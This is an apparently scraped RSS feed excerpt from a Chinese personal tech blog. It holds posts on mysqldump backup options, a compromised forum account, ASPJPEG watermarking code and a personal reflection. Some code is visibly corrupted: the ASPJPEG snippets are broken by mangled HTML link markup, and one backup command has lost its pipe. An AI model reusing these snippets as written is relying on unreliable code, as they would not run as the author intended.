8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb"><br />                        mysqldump --opt database<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        MySQL--host=remote-host -C database<span class="Apple-converted-space">&nbsp;</span></td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">由于mysqldump导出的是完整的SQL语句，所以用MySQL数据库备份客户程序很容易就能把数据导入了：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb"><br />                        mysqladmin create target_db_name<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        MySQL target_db_name backup-file.sql<span class="Apple-converted-space">&nbsp;</span></td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">MySQL数据库备份虽然大家在平时不经常遇到，但是多熟悉一门知识总不是坏事。MySQL数据库备份在使用的时候对于刚刚接触的人来说是保护数据库不会由于认为操作失误而导致数据丢失。</p>            </span></span>            <p>&nbsp;</p>            </p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">显示一条帮助消息并且退出。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb"><br />                        --fields-terminated-by=...<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        --fields-enclosed-by=...<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        --fields-optionally-enclosed-by=...<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        --fields-escaped-by=...<span class="Apple-converted-space">&nbsp;</span><br />                        <br />                        --fields-terminated-by=...<span class="Apple-converted-space">&nbsp;</span></td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">这些选择与-T选择一起使用，并且有相应的LOAD DATA INFILE子句相同的含义。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">LOAD DATA INFILE语法。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-F, --flush-logs</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">在开始导出前，洗掉在MySQL数据库备份服务器中的日志文件。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-f, --force,</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">即使我们在一个表导出期间得到一个SQL错误，继续。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-h, --host=..</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">从命名的主机上的MySQL数据库备份服务器导出数据。缺省主机是localhost。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-l, --lock-tables.</td>                    </tr>                </tbody>            </table>            </p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>二、正规的方法(官方建议)：</strong></p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">导出要用到MySQL数据库备份的mysqldump工具，基本用法是：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">mysqldump [OPTIONS] database [tables]</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">如果你不给定任何表，整个数据库将被导出。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">通过执行<strong>mysqldump --help</strong>，你能得到你mysqldump的版本支持的选项表。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">注意，如果你运行mysqldump没有--quick或--opt选项，mysqldump将在导出结果前装载整个结果集到内存中，如果你正在导出一个大的数据库，这将可能是一个问题。</p>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit"><strong>mysqldump</strong>支持下列选项：</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--add-locks</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">在每个表导出之前增加LOCK TABLES并且之后UNLOCK TABLE。(为了使得更快地插入到MySQL数据库备份)。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--add-drop-table</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">在每个create语句之前增加一个drop table。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--allow-keywords</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">允许创建是关键词的列名字。这由在列名前面加表名的方法做到。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-c, --complete-insert</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">使用完整的insert语句(用列名字)。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-C, --compress</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">如果客户和服务器均支持压缩，压缩两者间所有的信息。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--delayed</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">用INSERT DELAYED命令插入行。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-e, --extended-insert</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">使用全新多行INSERT语法。(给出更紧缩并且更快的插入语句)</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">-#, --debug[=option_string]</td>                    </tr>                </tbody>            </table>            <p style="padding-right: 0px; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 5px; margin: 0px; text-indent: 2em; padding-top: 5px; font-style: normal; font-family: inherit">跟踪程序的使用(为了调试)。</p>            <table style="border-right: rgb(0,153,204) 1px solid; table-layout: fixed; padding-right: 0px; border-top: rgb(0,153,204) 1px solid; padding-left: 0px; font-weight: normal; font-size: 14px; padding-bottom: 0px; margin: 0px; border-left: rgb(0,153,204) 1px solid; padding-top: 0px; border-bottom: rgb(0,153,204) 1px solid; font-style: normal; font-family: inherit; border-collapse: collapse" cellspacing="0" cellpadding="6" width="95%" align="center" border="0">                <tbody>                    <tr>                        <td style="padding-right: 8px; padding-left: 8px; font-weight: normal; font-size: 14px; padding-bottom: 8px; margin: 0px; padding-top: 8px; font-style: normal; font-family: inherit; word-wrap: break-word" bgcolor="#ddedfb">--help</td>                    </tr>                </tbody>            </table>            </div>            </td>        </tr>    </tbody></table></p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1097.html" target="_blank">继续阅读《MySQL数据库备份的基础知识大全》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=16">数据库-数据挖掘</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=mysql">mysql</a>&nbsp;&nbsp;<a href="http://www.nhs8.com/catalog.asp?tags=%E6%95%B0%E6%8D%AE%E5%BA%93">数据库</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1097.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/736.html">Oracle exp/imp导出导入工具的使用</a>&nbsp;&nbsp;(2009-12-18 5:26:13)</p><p><a  href="http://www.nhs8.com/post/735.html">如何在oracle中导入dmp数据库文件</a>&nbsp;&nbsp;(2009-12-18 5:22:33)</p><p><a  href="http://www.nhs8.com/post/639.html">Sql server2005 优化查询速度50个方法小结</a>&nbsp;&nbsp;(2009-12-9 23:28:35)</p><p><a  href="http://www.nhs8.com/post/278.html">在Oracle中导出、导入dmp数据库文件</a>&nbsp;&nbsp;(2009-9-2 1:47:29)</p><p><a  href="http://www.nhs8.com/post/238.html">MYSQL常用命令列表</a>&nbsp;&nbsp;(2009-8-19 11:34:45)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>数据库-数据挖掘</category><comments>http://www.nhs8.com/post/1097.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1097</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1097&amp;key=a84300d8</trackback:ping></item><item><title>在T00LS原来的号被社了</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1096.html</link><pubDate>Sun, 24 Jan 2010 15:47:23 +0800</pubDate><guid>http://www.nhs8.com/post/1096.html</guid><description><![CDATA[<p>ni10256</p><p>&nbsp;这个是我申请不久的号，被人射了，呵呵~没事，哥每个密码都不一样的！</p><p><img title="" alt="" onload="ResizeImage(this,520)" src="http://www.nhs8.com/upload/201001241549183655.jpg" /></p><p><img title="" alt="" onload="ResizeImage(this,520)" src="http://www.nhs8.com/upload/201001241548101234.jpg" /></p><p>不过我有点猜到是某人了~</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1096.html" target="_blank">继续阅读《在T00LS原来的号被社了》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1096.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1098.html">一次简单的“旁注”渗透</a>&nbsp;&nbsp;(2010-1-24 16:40:58)</p><p><a  href="http://www.nhs8.com/post/1091.html">cmd5.com整站程序下载 如假包换md5</a>&nbsp;&nbsp;(2010-1-24 12:4:40)</p><p><a  href="http://www.nhs8.com/post/1090.html">美印恶炒中国有30万网络大军 破坏力极大</a>&nbsp;&nbsp;(2010-1-24 11:56:47)</p><p><a  href="http://www.nhs8.com/post/1084.html">telnet到163邮箱发信</a>&nbsp;&nbsp;(2010-1-23 23:5:55)</p><p><a  href="http://www.nhs8.com/post/1083.html">CMD下建立VPN</a>&nbsp;&nbsp;(2010-1-23 21:9:2)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1096.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1096</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1096&amp;key=ce8c63cf</trackback:ping></item><item><title>使用ASPJPEG添加水印的方法</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1094.html</link><pubDate>Sun, 24 Jan 2010 13:22:49 +0800</pubDate><guid>http://www.nhs8.com/post/1094.html</guid><description><![CDATA[<p>ps：此修改经过测试会影响自动上传插件，导致无响应！</p><p>今天在月光的博客上看到一个关于ASPJPEG这个组件的使用方法。</p><p><a www.nhs8.com="" href="http://www.nhs8.com/upload/201001241434105253.Jpeg&quot;)&nbsp; ' 建立对象&lt;br &gt;&lt;/a&gt;Jpeg.Open BlogPath &amp; &quot;/upload/&quot; &amp; FileName&nbsp; ' 图片所在位置&lt;br /&gt;Jpeg.Canvas.Font.Color = &amp;H000000 ' 颜色,这里是设置成:黑 &lt;br /&gt;Jpeg.Canvas.Font.Family = &quot;方正隶变简体&quot;&nbsp; ' 设置字体 &lt;br /&gt;Jpeg.Canvas.Font.Bold = False '是否设置成粗体 &lt;br /&gt;Jpeg.Canvas.Font.Size = 26 '字体大小 &lt;br /&gt;Jpeg.Canvas.Font.Quality = 4 ' 文字清晰度&lt;br /&gt;Jpeg.Canvas.Print Jpeg.OriginalWidth/2-170,Jpeg.OriginalHeight-30, &quot;&lt;a upload=">upload/201001241429554141.gif</a>下载吧 <br />四、图片切割 <br />一直以来，对aspjpeg不了解的人以为是无法用它来进行切割的。 <br />其实有这样的一个方法的 <br />crop x1,y1,x2,y2 <br />切割长方型左上角x坐标，y坐标 右下角x坐标 y坐标 <br />下面我就做一个演示哈 <br />Set Jpeg = Server.CreateObject(&quot;Persits.Jpeg&quot;) <br />jpeg.open server.MapPath(&quot;/pic/1.gif&quot;) <br />jpeg.width=70 <br />Jpeg.Height = Jpeg.OriginalHeight*70 / jpeg.Originawidth <br />jpeg.crop 0,0,70,52 开始切割其实是把超过52象素的下部分去掉 <br />jpeg.save server.MapPath(&quot;/temp_pic/small_1.gif&quot;) 保存 <br />怎么样，很简单吧 <br />五、图片合并 <br />我们这里是要把logo图片加到dodge_viper.jpg图片上去 <br />其实，图片合并的方法也可以用来动态打水印哦 <br />Set Photo = Server.CreateObject(&quot;Persits.Jpeg&quot;) <br />PhotoPath = Server.MapPath(&quot;images&quot;) &amp; &quot;dodge_viper.jpg&quot; <br />Photo.Open PhotoPath <br />Set Logo = Server.CreateObject(&quot;Persits.Jpeg&quot;) <br />LogoPath = Server.MapPath(&quot;images&quot;) &amp; &quot;clock.jpg&quot; <br />Logo.Open LogoPath</p><p>Logo.Width = 70 <br />Logo.Height = Logo.Width * Logo.OriginalHeight / Logo.OriginalWidth</p><p>Photo.DrawImage 0, 0, Logo</p><p>Photo.SendBinary 这里用了sendBinary的输出方法。当然，你也可以先保存更改后的dodge_viper.jpg，再输入也可以。我个人不大喜欢用sendBinary方法，在网速慢的时候容易出错。在速度方面也不怎样。呵呵。 <br />六、数据库支持 <br />这里不多说了。其实就是Binary方法，大家知道图片存进数据库只能存为二进制的文件的。所以代码就懒的写了。 <br />七、更多方法介绍 <br />Canvas.Line(Left, Top, Right, Bottom) <br />画一条直线 <br />Canvas.Ellipse(Left, Top, Right, Bottom) <br />画出一个椭圆 <br />Canvas.Circle(X, Y, Radius) <br />画出一个圆 <br />Canvas.Bar(Left, Top, Right, Bottom) <br />画出一个长方形，上面有代码介绍了 <br />Canvas.Font.ShadowColor <br />文字阴影颜色 <br />Canvas.Font.ShadowXOffset As Long <br />阴影X坐标设定 <br />Canvas.Font.ShadowYOffset As Long <br />Y坐标设定 <br />Canvas.Font.BkMode As String <br />文字背景</p><p><br />使用实例: 添加有透明度的水印文字</p><p>&nbsp; Set Jpeg = Server.CreateObject(&quot;Persits.Jpeg&quot;)&nbsp; ' 建立对象<br />&nbsp; Jpeg.Open Server.Mappath(sUploadDir &amp; sSaveFileName) ' 图片所在位置<br />&nbsp; Dim TempA '原始图片的二进制数据<br />&nbsp; Dim TempB '加了不透明文字水印的图片<br />&nbsp; Dim TempC '最终效果<br />&nbsp; TempA=Jpeg.Binary'将原始数据赋给TempA <br />&nbsp; Jpeg.Canvas.Font.Color = &amp;hffffff ' 颜色,这里是设置成:黑 <br />&nbsp; Jpeg.Canvas.Font.Family = &quot;宋体&quot;&nbsp; ' 设置字体 <br />&nbsp; Jpeg.Canvas.Font.Bold = True '是否设置成粗体 <br />&nbsp; Jpeg.Canvas.Font.Size = 28 '字体大小 <br />&nbsp; Jpeg.Canvas.Font.Quality = 5 ' 文字清晰度<br />&nbsp; Jpeg.Canvas.Print Jpeg.OriginalWidth/2-170,Jpeg.OriginalHeight/2-30, &quot;&lt;a href=&quot;http://www.nhs8.com/upload/201001241429564520.Jpeg&quot;) <br />&nbsp; MyJpeg.OpenBinary TempA <br />&nbsp; Set Logo = Server.CreateObject(&quot;Persits.Jpeg&quot;) <br />&nbsp; Logo.OpenBinary TempB <br />&nbsp; MyJpeg.DrawImage 0,0, Logo, 0.4'0.3是透明度 <br />&nbsp; TempC=MyJpeg.Binary'将最终结果赋值给TempC,这时也可以生成目标图片了 <br />&nbsp; MyJpeg.Save Server.Mappath(sUploadDir &amp; sSaveFileName)&nbsp; ' 保存文件<br />&nbsp; set TempA=nothing <br />&nbsp; set TempB=nothing <br />&nbsp; set TempC=nothing <br />&nbsp; Jpeg.close <br />&nbsp; MyJpeg.Close <br />&nbsp; Logo.Close</p><p>1 白色<font color="#cc0033">&amp;HFFFFFF</font> 2 红色&amp;HFF0000 3 绿色&amp;H00FF00 4 蓝色&amp;H0000FF 5 牡丹<font color="#cc0033">红</font>&amp;HFF00FF 6 青色&amp;H00FFFF 7 黄色&amp;HFFFF00 8 黑色&amp;H000000</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1094.html" target="_blank">继续阅读《使用ASPJPEG添加水印的方法》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=1">神刀网站建设</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%AB%99">网站</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1094.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1092.html">白开水的自白</a>&nbsp;&nbsp;(2010-1-24 12:35:22)</p><p><a  href="http://www.nhs8.com/post/1004.html">一个技巧的SEO优化方案</a>&nbsp;&nbsp;(2010-1-20 3:22:21)</p><p><a  href="http://www.nhs8.com/post/997.html">zblog代码修改介绍</a>&nbsp;&nbsp;(2010-1-20 3:0:59)</p><p><a  href="http://www.nhs8.com/post/996.html">zblog修改简单教程</a>&nbsp;&nbsp;(2010-1-20 2:58:40)</p><p><a  href="http://www.nhs8.com/post/995.html">z-blog-自动加入版权信息代码</a>&nbsp;&nbsp;(2010-1-20 2:55:52)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>神刀网站建设</category><comments>http://www.nhs8.com/post/1094.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1094</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1094&amp;key=239b5f53</trackback:ping></item><item><title>白开水的自白</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1092.html</link><pubDate>Sun, 24 Jan 2010 12:35:22 +0800</pubDate><guid>http://www.nhs8.com/post/1092.html</guid><description><![CDATA[<p><span style="font-size: large">回想</span>起初二开站的时候,是寄托在中国学生网的10m免费空间,那时做了款共享软件超级屏幕锁,快捷卫士,还有其他小工具,怀念那时学的破解技术呀.<br />高一高二都在更新,到了高三高考就停止更新了,一直想更新自己孩子,到了毕业却把这颗心给落下,走进网络安全,学会鸟站,却迷失了自己方向.<br />我就像屏幕锁那样软件周期已经算完了吗?</p><p><br 